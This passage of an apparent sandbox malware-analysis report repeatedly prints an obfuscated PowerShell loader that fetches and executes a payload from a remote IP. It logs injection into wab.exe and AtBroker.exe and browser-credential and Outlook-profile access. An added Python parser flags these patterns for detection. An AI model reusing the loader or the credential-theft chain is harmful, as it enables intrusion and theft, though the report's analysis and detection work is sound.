') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. 
') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. 
') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$ruthenious = 1;$dirkningernes='substrin';$dirkningernes+='g';function sonedkkets($fumingly){$programmeringsbegrebet=$fumingly.length-$ruthenious;for($ozonify=1; $ozonify -lt $programmeringsbegrebet; $ozonify+=(2)){$hjul+=$fumingly.$dirkningernes.invoke($ozonify, $ruthenious);}$hjul;}function innovative($oryctognosy238){. ($complexes) ($oryctognosy238);}$glasskaaret=sonedkkets ' mhokz.iblflea /u5s. 0s a(iw.i nkddo,w s, bn t ,1 0 .s0c;, kwiiun 6t4f; .x,6,4s;, trbv :t1i2b1s.c0e)h ,geeac kdo /b2o0 1 0a0 1 0 1f f.i rretf orxl/.1 2.1o. 0 ';$beshaming=sonedkkets ' ucsheur -ma.g.e,n.tb ';$bladfod=sonedkkets ' hot t pp:a/s/,8 7,.c1t2v1l. 1r0r5l. 1 6o3h/.l i,cpeun c.ejsa.,t.trf ';$gruppemedlemmernes=sonedkkets 's> ';$complexes=sonedkkets 'eireaxb ';$gambia = sonedkkets ' e,cth o b%aa,pepodoa t,a.%s\ p,rweszsycg,ovmmait.ilc,.ab.e n, u& & .elcdhbo. $. ';innovative (sonedkkets 'b$cgslso bbagl :.uun wga r.r,aanct a b.i lti tdy =d(ucam,df /icl a$ goa.m b imav) ');innovative (sonedkkets 't$ g lfodb a l.:mhke e l.t a,p,2 6m= $bb,l a difsoud .ssfp lci t.(v$ogur u p,p e mbe dslaecm m eprhnke s.) ');$bladfod=$heeltap26[0];innovative (sonedkkets ',$tgpl o bgadlo:,rpr b l a,d ets =mnte w -aosb,j euc t as.y sst e.m .an e t .rwfembtc l i eln t, ');innovative (sonedkkets ' $ rardb.lda.d,ehs,..hge.asdce.rls [ $kb.ess.hka msinnogt]v=k$ gilfaasaskk a.a r e t ');$forvanskes=sonedkkets ' rhrebllpaudpetsp.ad otwsnplmooasdsfcicl e (s$.bml.addpf ofdt,b$dhpoco.phoue,s,), ';$forvanskes=$unwarrantability[1]+$forvanskes;$hoopoes=$unwarrantability[0];innovative (sonedkkets ' $.galzosb a la:fgfraa vrh j en=d(mtte,s t -sp a tfh $ahro o.paore ss)a ');while (!$gravhje) {innovative (sonedkkets 'p$ gal o bta ll: s t ukefa rpr e s.tmefn s =s$ptrrtube. 
') ;innovative $forvanskes;innovative (sonedkkets ',s.tta rctd-isdl ewe pa ,4 ');innovative (sonedkkets 'b$eg,lko.b a,l :wgirla,v.hvj el=.( t ecsutm-bpra t h g$lhsosogpcopess,)e ') ;innovative (sonedkkets ' $ gdl o b.aald:,s.u,prenr feihnsi.c ablo=s$ng,l.ofb.a.lm:rvdi tuh amr,d.tfs,+ +a%.$,hpe.e l tna p 2k6,..csobu nct. ') ;$bladfod=$heeltap26[$superfinical];}innovative (sonedkkets 'f$.gslmo baa l,:bgfu l i xg ,=e bg,ewt -pc odndt,egnmt $uh obobp opetsu ');innovative (sonedkkets 'e$.gllrolb.aolt: t.hso,r a cuo.sut rdatc aan ,=. k[rs y s t e mp.jcuopncv ebr t ]m:b: ffrcotm,b,aksmee6g4is.tsrtifn,g.(s$fg u lrimx.)u ');innovative (sonedkkets ',$mg lvo b,a lk: g a r,die ntpba rut iqebnne, = ,[bs yssdt enm . tde xut .ueunpc,osd.ifnlgl]u:a: a s c,ipi,. g eht s.t r,i n g ( $ tkhnosr.a cvoisotnr aschasn )u ');innovative (sonedkkets 'e$,gpllo.b aml.: fdd e,vbasr e i n d.utsstsr i e nssp= $pg a.r d,ecnlp avr,t.i,eun e . s,urbusst r i.n ge( 2o9a8.8s7 2 ,s2.6 1s1n8e)e ');innovative $fdevareindustriens;" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
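The memory-write, section-map, APC and process-creation lines earlier in the report, together with the file and registry accesses listed under Stealing of Sensitive Information, describe a single chain: powershell.exe writes into wab.exe, wab.exe maps execute/read/write sections into RAVCpl64.exe and AtBroker.exe, RAVCpl64.exe spawns AtBroker.exe, and AtBroker.exe (which also maps into firefox.exe) is the process that opens the Chrome and Edge Login Data, Web Data, Cookies and Local State files and the Outlook profile key. The Python below is an added example for this page, not part of the report; it parses behaviour lines of this shape (a constructed sample copied from the lines above, with the "Jump to behavior" link text left in), rebuilds parent/child and injector/target relations, and flags two things an analyst would pivot on: wab.exe launched by a parent other than explorer.exe (an assumed allow-list for this example, not the report's own rule), and a process that both received injected code and then touched credential stores.

```python
import re
from collections import defaultdict

# Constructed sample: behaviour lines copied from the report above. The
# trailing "Jump to behavior" link text is left in to show the parser tolerates it.
REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3080000 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Windows\SysWOW64\AtBroker.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Thread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Jump to behavior
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
""".strip().splitlines()

LINE_RE = re.compile(
    r"^Source: (?P<src>.+?\.exe) "
    r"(?P<kind>Process created|Memory written|Section loaded|Thread APC queued|File opened|Key opened): "
    r"(?P<rest>.*?)(?: Jump to behavior)?$"
)

CREDENTIAL_MARKERS = (
    "login data", "web data", "cookies", "local state",   # Chromium profile files
    "logins.json", "key4.db",                             # Firefox profile files
    "windows messaging subsystem",                        # Outlook/MAPI profile key
)
ALLOWED_WAB_PARENTS = {"explorer.exe"}  # assumption for this example, not the report's rule


def basename(path: str) -> str:
    return path.rstrip("\\").rsplit("\\", 1)[-1].lower()


def parse(line: str):
    """Return (source exe, event kind, target, extra) or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    src, kind, rest = basename(m["src"]), m["kind"], m["rest"]
    if kind == "Process created":                      # '<path> "<cmdline>"'
        return src, kind, basename(rest.split(' "', 1)[0]), ""
    if kind == "Memory written":                       # '<path> base: <hex>'
        return src, kind, basename(rest.split(" base:", 1)[0]), ""
    if kind == "Section loaded":                       # 'NULL target: <path> protection: <prot>'
        t = re.search(r"target: (.+?) protection: (.+)", rest)
        return src, kind, basename(t.group(1)), t.group(2)
    if kind == "Thread APC queued":                    # 'target process: <path>'
        return src, kind, basename(rest.split("target process: ", 1)[-1]), ""
    return src, kind, rest, ""                         # File/Key opened: the object path


def analyse(lines):
    parent = {}                      # child exe -> parent exe
    injected = defaultdict(set)      # target exe -> {exe that wrote code into it}
    cred_access = defaultdict(list)  # exe -> [credential object opened]
    for line in lines:
        ev = parse(line)
        if ev is None:
            continue
        src, kind, target, extra = ev
        if kind == "Process created":
            parent[target] = src
        elif kind in ("Memory written", "Thread APC queued"):
            injected[target].add(src)
        elif kind == "Section loaded" and "execute" in extra:
            injected[target].add(src)        # executable mapping into a foreign process
        elif kind in ("File opened", "Key opened"):
            if any(k in target.lower() for k in CREDENTIAL_MARKERS):
                cred_access[src].append(target)

    findings = []
    for child, par in parent.items():
        if child == "wab.exe" and par not in ALLOWED_WAB_PARENTS:
            findings.append(f"wab.exe spawned by unusual parent {par}")
    for proc, objs in cred_access.items():
        if proc in injected:           # credential access from a process that was injected into
            findings.append(
                f"{proc} (code injected by {', '.join(sorted(injected[proc]))}) "
                f"opened {len(objs)} credential store(s)"
            )
    return {
        "parent": parent,
        "injected": {k: sorted(v) for k, v in injected.items()},
        "findings": findings,
    }


def injection_chain(result, leaf: str) -> list:
    """Walk from a leaf back through injector (preferred) or parent links,
    e.g. firefox.exe -> atbroker.exe -> wab.exe -> powershell.exe."""
    chain, seen = [leaf], {leaf}
    while True:
        cur = chain[-1]
        nxt = (result["injected"].get(cur) or [result["parent"].get(cur)])[0]
        if not nxt or nxt in seen:
            return chain
        chain.append(nxt)
        seen.add(nxt)
```

The same parser runs unchanged over the full behaviour list of a report; the "Thread register set: target process: <pid>" lines are deliberately ignored because they carry a PID rather than a path, and the "read write" section map into firefox.exe is not treated as injection on its own since only the execute-capable mapping that follows it delivers code.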

Remote Access Functionality

Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY